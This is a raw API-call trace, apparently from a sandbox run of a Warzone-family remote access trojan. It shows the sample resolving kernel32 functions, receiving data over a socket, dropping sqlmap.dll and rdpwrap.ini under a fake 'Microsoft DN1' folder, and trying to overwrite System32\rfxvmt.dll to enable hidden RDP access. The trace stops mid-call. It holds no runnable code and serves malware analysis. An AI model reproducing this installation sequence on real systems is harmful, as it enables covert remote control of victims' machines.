[0312.143] lstrcmpA (lpString1="ClearCommBreak", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="ClearCommError", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="ClosePackageInfo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseState", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpool", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CmdBatNotification", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CommConfigDialogA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CommConfigDialogW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareCalendarDates", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareFileTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareStringA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareStringEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CompareStringW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyContext", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFile2", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyFileW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CopyLZFile", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateActCtxA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateActCtxW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateDirectoryW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateEnclave", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateEventA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateEventExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.144] lstrcmpA (lpString1="CreateEventExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateEventW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFiber", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFiberEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFile2", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileMappingA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileMappingW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateFileW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateHardLinkA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateHardLinkW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateJobObjectA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateJobObjectW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateJobSet", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMailslotA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMailslotW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMutexA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMutexExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMutexExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateMutexW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreatePipe", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.145] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateProcessW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateRemoteThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateRemoteThreadEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSemaphoreA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSemaphoreExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSemaphoreExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSemaphoreW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSocketHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSymbolicLinkA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSymbolicLinkTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSymbolicLinkTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateSymbolicLinkW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateTapePartition", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpool", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpoolCleanupGroup", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpoolTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpoolWait", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateThreadpoolWork", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateTimerQueue", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.146] lstrcmpA (lpString1="CreateTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CreateToolhelp32Snapshot", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CreateWaitableTimerA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CreateWaitableTimerExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CreateWaitableTimerExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CreateWaitableTimerW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="CtrlRoutine", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="DeactivateActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="DeactivateActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] lstrcmpA (lpString1="DebugActiveProcess", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.147] Wow64DisableWow64FsRedirection (in: OldValue=0x488ff1c | out: OldValue=0x488ff1c*=0x0) returned 1 [0312.147] PathFileExistsW (pszPath="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned 0 [0312.148] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned 41 [0312.148] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.148] lstrcpyW (in: lpString1=0x3790000, lpString2="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0312.148] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x364 [0312.148] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned 41 [0312.148] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x4890000 [0312.149] lstrcpyW (in: lpString1=0x4890000, lpString2="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0312.149] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.150] lstrlenW (lpString="C:\\Windows\\System32\\rfxvmt.dll") returned 30 [0312.150] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.150] lstrcpyW (in: lpString1=0x3790000, lpString2="C:\\Windows\\System32\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0312.150] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x368 [0312.150] lstrlenW (lpString="C:\\Windows\\System32\\rfxvmt.dll") returned 30 [0312.150] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x48a0000 [0312.150] lstrcpyW (in: lpString1=0x48a0000, lpString2="C:\\Windows\\System32\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0312.150] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.151] GetCurrentProcess () returned 0xffffffff [0312.151] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0312.151] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0312.151] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x488fef8 | out: Wow64Process=0x488fef8*=1) returned 1 [0312.151] GetProcessHeap () returned 0x650000 [0312.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x672560 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x672690 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x672690, Size=0x8) returned 0x6726a0 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6726a0, Size=0xc) returned 0x678cd0 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x678cd0, Size=0x10) returned 0x678ca0 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678cb8 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x672560 | out: hHeap=0x650000) returned 1 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0312.152] lstrlenA (lpString="warzone160") returned 10 [0312.152] lstrlenA (lpString="warzone160") returned 10 [0312.152] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.152] lstrcpyA (in: lpString1=0x3790000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0312.152] lstrlenA (lpString="warzone160") returned 10 [0312.152] GetProcessHeap () returned 0x650000 [0312.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0312.152] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678cd0 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ce8 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678d00 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678d18 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0312.153] GetProcessHeap () returned 0x650000 [0312.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0312.153] GetProcessHeap () returned 0x650000 [0312.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0312.154] send (s=0x2c0, buf=0x678d18*, len=16, flags=0) returned 16 [0312.154] GetProcessHeap () returned 0x650000 [0312.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d18 | out: hHeap=0x650000) returned 1 [0312.154] GetProcessHeap () returned 0x650000 [0312.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0312.154] GetProcessHeap () returned 0x650000 [0312.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0312.154] WaitForSingleObject (hHandle=0x258, dwMilliseconds=0xffffffff) returned 0x0 [0314.206] GetProcessHeap () returned 0x650000 [0314.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c800) returned 0x686ba8 [0314.210] GetProcessHeap () returned 0x650000 [0314.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c800) returned 0x6affa8 [0314.213] GetProcessHeap () returned 0x650000 [0314.215] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.215] GetProcessHeap () returned 0x650000 [0314.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c800) returned 0x686ba8 [0314.215] GetProcessHeap () returned 0x650000 [0314.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x0) returned 0x672690 [0314.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" (normalized: "c:\\program files\\microsoft dn1\\sqlmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0314.218] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0314.218] WriteFile (in: hFile=0x378, lpBuffer=0x686ba8*, nNumberOfBytesToWrite=0x1c800, lpNumberOfBytesWritten=0x488fefc, lpOverlapped=0x0 | out: lpBuffer=0x686ba8*, lpNumberOfBytesWritten=0x488fefc*=0x1c800, lpOverlapped=0x0) returned 1 [0314.221] CloseHandle (hObject=0x378) returned 1 [0314.225] CreateFileW (lpFileName="C:\\Windows\\System32\\rfxvmt.dll" (normalized: "c:\\windows\\system32\\rfxvmt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0314.226] GetLastError () returned 0x50 [0314.226] CreateFileW (lpFileName="C:\\Windows\\System32\\rfxvmt.dll" (normalized: "c:\\windows\\system32\\rfxvmt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0314.226] GetProcessHeap () returned 0x650000 [0314.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x672690 | out: hHeap=0x650000) returned 1 [0314.226] GetProcessHeap () returned 0x650000 [0314.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.229] ReleaseMutex (hMutex=0x368) returned 0 [0314.229] CloseHandle (hObject=0x368) returned 1 [0314.229] VirtualFree (lpAddress=0x48a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0314.230] ReleaseMutex (hMutex=0x364) returned 0 [0314.230] CloseHandle (hObject=0x364) returned 1 [0314.230] VirtualFree (lpAddress=0x4890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0314.230] PathFileExistsW (pszPath="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned 0 [0314.231] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned 42 [0314.231] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0314.231] lstrcpyW (in: lpString1=0x3790000, lpString2="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0314.231] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x364 [0314.231] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned 42 [0314.231] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x4890000 [0314.232] lstrcpyW (in: lpString1=0x4890000, lpString2="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0314.232] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x6726e0 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x6725f0 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6725f0, Size=0x8) returned 0x672560 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x672560, Size=0xc) returned 0x678d18 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x678d18, Size=0x10) returned 0x678ca0 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678d18 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6726e0 | out: hHeap=0x650000) returned 1 [0314.233] GetProcessHeap () returned 0x650000 [0314.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0314.233] lstrlenA (lpString="warzone160") returned 10 [0314.233] lstrlenA (lpString="warzone160") returned 10 [0314.233] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0314.234] lstrcpyA (in: lpString1=0x3790000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0314.234] lstrlenA (lpString="warzone160") returned 10 [0314.234] GetProcessHeap () returned 0x650000 [0314.234] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0314.234] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0314.234] GetProcessHeap () returned 0x650000 [0314.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678cb8 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cd0 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678ce8 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678d00 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0314.235] GetProcessHeap () returned 0x650000 [0314.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0314.235] send (s=0x2c0, buf=0x678d00*, len=16, flags=0) returned 16 [0314.236] GetProcessHeap () returned 0x650000 [0314.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0314.236] GetProcessHeap () returned 0x650000 [0314.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0314.236] GetProcessHeap () returned 0x650000 [0314.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d18 | out: hHeap=0x650000) returned 1 [0314.236] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0316.359] GetProcessHeap () returned 0x650000 [0316.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3defd) returned 0x48a0048 [0316.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" (normalized: "c:\\program files\\microsoft dn1\\rdpwrap.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 